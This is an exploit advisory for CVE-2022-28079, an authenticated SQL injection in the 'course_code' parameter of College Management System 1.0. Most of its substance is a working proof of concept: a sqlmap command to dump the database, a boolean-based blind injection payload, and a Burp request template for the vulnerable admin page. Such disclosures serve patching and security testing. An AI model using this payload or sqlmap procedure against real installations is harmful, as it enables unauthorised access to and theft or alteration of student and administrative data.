College Management System 1.0 SQL Injection

College Management System version 1.0 suffers from a remote SQL injection vulnerability.

SHA-256 | b22b4daf0882e631e72558215fc7c93f3286e35a1f1f3a8a70f7fb9b95c0a356

# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References:


1. Description:

College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.

2. Proof of Concept:

In Burpsuite intercept the request from the affected page with
'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:

sqlmap -r poc.txt --dbms=mysql

3. Example payload:

boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ

4. Burpsuite request:

POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36


Related Posts